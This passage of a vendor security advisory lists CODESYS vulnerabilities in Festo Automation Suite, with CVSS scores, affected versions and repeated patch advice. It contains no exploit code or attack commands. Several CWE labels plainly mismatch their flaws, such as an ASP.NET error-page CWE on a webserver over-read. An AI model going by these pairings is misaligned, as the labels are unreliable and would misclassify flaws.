Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-822 Untrusted Pointer Dereference Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H CVE-2022-22515 A remote, authenticated attacker could utilize the control program of the CODESYS Control runtime system to use the vulnerability in order to read and modify the configuration file(s) of the affected products. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. 
Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-668 Exposure of Resource to Wrong Sphere Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.1 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N CVE-2022-22516 The SysDrv3S driver in the CODESYS Control runtime system on Microsoft Windows allows any system user to read and write within restricted memory space. 
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-732 Incorrect Permission Assignment for Critical Resource Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-22517 An unauthenticated, remote attacker can disrupt existing communication channels between CODESYS products by guessing a valid channel ID and injecting packets. This results in the communication channel to be closed. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. 
To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-33 Path Traversal: '....' (Multiple Dot) Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2022-22519 A remote, unauthenticated attacker can send a specific crafted HTTP or HTTPS requests causing a buffer over-read resulting in a crash of the webserver of the CODESYS Control runtime system. 
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-12 ASP.NET Misconfiguration: Missing Custom Error Page Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2022-30791 In CmpBlkDrvTcp of CODESYS V3 in multiple versions an uncontrolled ressource consumption allows an unauthorized attacker to block new TCP connections. Existing connections are not affected. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. 
- Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied.
- Regularly monitor Codesys security advisories and apply updates promptly.
- Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.
Mitigation: The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs.
Mitigation: For more information see the associated Festo SE & Co. KG security advisory FSA-202601 (FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF; FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML): https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json and https://certvde.com/en/advisories/VDE-2025-108
Relevant CWE: CWE-400 Uncontrolled Resource Consumption
Metrics: CVSS Version 3.1, Base Score 7.5, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2022-30792
In CmpChannelServer of CODESYS V3 in multiple versions an uncontrolled resource consumption allows an unauthorized attacker to block new communication channel connections. Existing connections are not affected.
Affected Products: CODESYS in Festo Automation Suite
Vendor: FESTO, CODESYS
Product Version:
- FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*
- FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*
- FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*
- FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*
Product Status: known_affected
Remediations:
Mitigation: FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:
Mitigation: Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to:
- Download the latest, patched version of Codesys directly from the official Codesys website.
- Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied.
- Regularly monitor Codesys security advisories and apply updates promptly.
- Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.
Mitigation: The following product versions have been fixed: CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs.
Mitigation: For more information see the associated Festo SE & Co. KG security advisory FSA-202601 (FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF; FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML): https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json and https://certvde.com/en/advisories/VDE-2025-108
Relevant CWE: CWE-400 Uncontrolled Resource Consumption
Metrics: CVSS Version 3.1, Base Score 7.5, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2022-31805
In the CODESYS Development System multiple components in multiple versions transmit the passwords for the communication between clients and servers unprotected.
Affected Products, Vendor, Product Version, Product Status and Remediations: identical to the CVE-2022-30792 entry above.
Relevant CWE: CWE-523 Unprotected Transport of Credentials
Metrics: CVSS Version 3.1, Base Score 7.5, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE-2022-31806
In CODESYS V2 PLCWinNT and Runtime Toolkit 32 in versions prior to V2.4.7.57 password protection is not enabled by default and there is no information or prompt to enable password protection at login in case no password is set at the controller.
Affected Products, Vendor, Product Version, Product Status and Remediations: identical to the CVE-2022-30792 entry above.
Relevant CWE: CWE-1188 Initialization of a Resource with an Insecure Default
Metrics: CVSS Version 3.1, Base Score 9.8, Base Severity CRITICAL, Vector String CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2022-32136
In multiple CODESYS products, a low privileged remote attacker may craft a request that causes a read access to an uninitialized pointer, resulting in a denial-of-service. User interaction is not required.
Affected Products, Vendor, Product Version, Product Status and Remediations: identical to the CVE-2022-30792 entry above.
Relevant CWE: CWE-82 Improper Neutralization of Script in Attributes of IMG Tags in a Web Page
Metrics: CVSS Version 3.1, Base Score 6.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2022-32137
In multiple CODESYS products, a low privileged remote attacker may craft a request, which may cause a heap-based buffer overflow, resulting in a denial-of-service condition or memory overwrite. User interaction is not required.
Affected Products, Vendor, Product Version, Product Status and Remediations: identical to the CVE-2022-30792 entry above.
Relevant CWE: CWE-122 Heap-based Buffer Overflow
Metrics: CVSS Version 3.1, Base Score 8.8, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2022-32138
In multiple CODESYS products, a remote attacker may craft a request which may cause an unexpected sign extension, resulting in a denial-of-service condition or memory overwrite.
Affected Products, Vendor, Product Version, Product Status and Remediations: identical to the CVE-2022-30792 entry above.
Relevant CWE: CWE-194 Unexpected Sign Extension
Metrics: CVSS Version 3.1, Base Score 8.8, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2022-32139
In multiple CODESYS products, a low privileged remote attacker may craft a request, which causes an out-of-bounds read, resulting in a denial-of-service condition. User interaction is not required.
Affected Products, Vendor, Product Version, Product Status and Remediations: identical to the CVE-2022-30792 entry above.
Relevant CWE: CWE-125 Out-of-bounds Read
Metrics: CVSS Version 3.1, Base Score 6.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2022-32140
Multiple CODESYS products are affected by a buffer overflow. A low privileged remote attacker may craft a request, which can cause a buffer copy without checking the size of the service, resulting in a denial-of-service condition. User interaction is not required.
Affected Products, Vendor, Product Version, Product Status and Remediations: identical to the CVE-2022-30792 entry above.
Relevant CWE: CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
Metrics: CVSS Version 3.1, Base Score 6.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2022-32141
Multiple CODESYS Products are prone to a buffer over-read. A low privileged remote attacker may craft a request with an invalid offset, which can cause an internal buffer over-read, resulting in a denial-of-service condition. User interaction is not required.
Affected Products, Vendor, Product Version, Product Status and Remediations: identical to the CVE-2022-30792 entry above.
Relevant CWE: CWE-126 Buffer Over-read
Metrics: CVSS Version 3.1, Base Score 6.5, Base Severity MEDIUM, Vector String CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2022-32142
Multiple CODESYS Products are prone to an out-of-bounds read or write access. A low privileged remote attacker may craft a request with an invalid offset, which can cause an out-of-bounds read or write access, resulting in a denial-of-service condition or local memory overwrite, which can lead to a change of local files. User interaction is not required.
Affected Products, Vendor, Product Version, Product Status and Remediations: identical to the CVE-2022-30792 entry above.
Relevant CWE: CWE-823 Use of Out-of-range Pointer Offset
Metrics: CVSS Version 3.0, Base Score 8.1, Base Severity HIGH, Vector String CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

CVE-2022-32143
In multiple CODESYS products, the file download and upload function allows access to internal files in the working directory, e.g. firmware files of the PLC. All requests are processed on the controller only if no level 1 password is configured on the controller or if the remote attacker has previously successfully authenticated himself to the controller. A successful attack may lead to a denial of service, change of local files, or drain of confidential information. User interaction is not required.
Affected Products, Vendor, Product Version, Product Status and Remediations: identical to the CVE-2022-30792 entry above.
Relevant CWE: CWE-552 Files or Directories Accessible to External Parties
Metrics: CVSS Version 3.1, Base Score 8.8, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2022-4046
In CODESYS Control in multiple versions an improper restriction of operations within the bounds of a memory buffer allows a remote attacker with user privileges to gain full access to the device.
Affected Products, Vendor, Product Version, Product Status and Remediations: identical to the CVE-2022-30792 entry above.
Relevant CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer
Metrics: CVSS Version 3.0, Base Score 8.8, Base Severity HIGH, Vector String CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2022-4048
Inadequate Encryption Strength in CODESYS Development System V3 versions prior to V3.5.18.40 allows an unauthenticated local attacker to access and manipulate code of the encrypted boot application.
Affected Products, Vendor, Product Version, Product Status and Remediations: identical to the CVE-2022-30792 entry above.
Relevant CWE: CWE-326 Inadequate Encryption Strength
Metrics: CVSS Version 3.1, Base Score 7.7, Base Severity HIGH, Vector String CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CVE-2022-4224
In multiple products of CODESYS v3 in multiple versions a remote low privileged user could utilize this vulnerability to read and modify system files and OS resources or DoS the device.
Affected Products, Vendor, Product Version, Product Status and Remediations: identical to the CVE-2022-30792 entry above.
Relevant CWE: CWE-1188 Initialization of a Resource with an Insecure Default
Metrics: CVSS Version 3.1, Base Score 8.8, Base Severity HIGH, Vector String CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2022-47378
Multiple CODESYS products in multiple versions are prone to an improper input validation vulnerability. An authenticated remote attacker may craft specific requests that use the vulnerability leading to a denial-of-service condition.
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2022-47379 An authenticated, remote attacker may use a out-of-bounds write vulnerability in multiple CODESYS products in multiple versions to write data into memory which can lead to a denial-of-service condition, memory overwriting, or remote code execution. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. 
To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-47380 An authenticated remote attacker may use a stack basedout-of-bounds write vulnerability in multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution. 
View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. 
https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-47381 An authenticated remote attacker may use a stack based out-of-bounds write vulnerability in multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. 
To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-47383 An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution. 
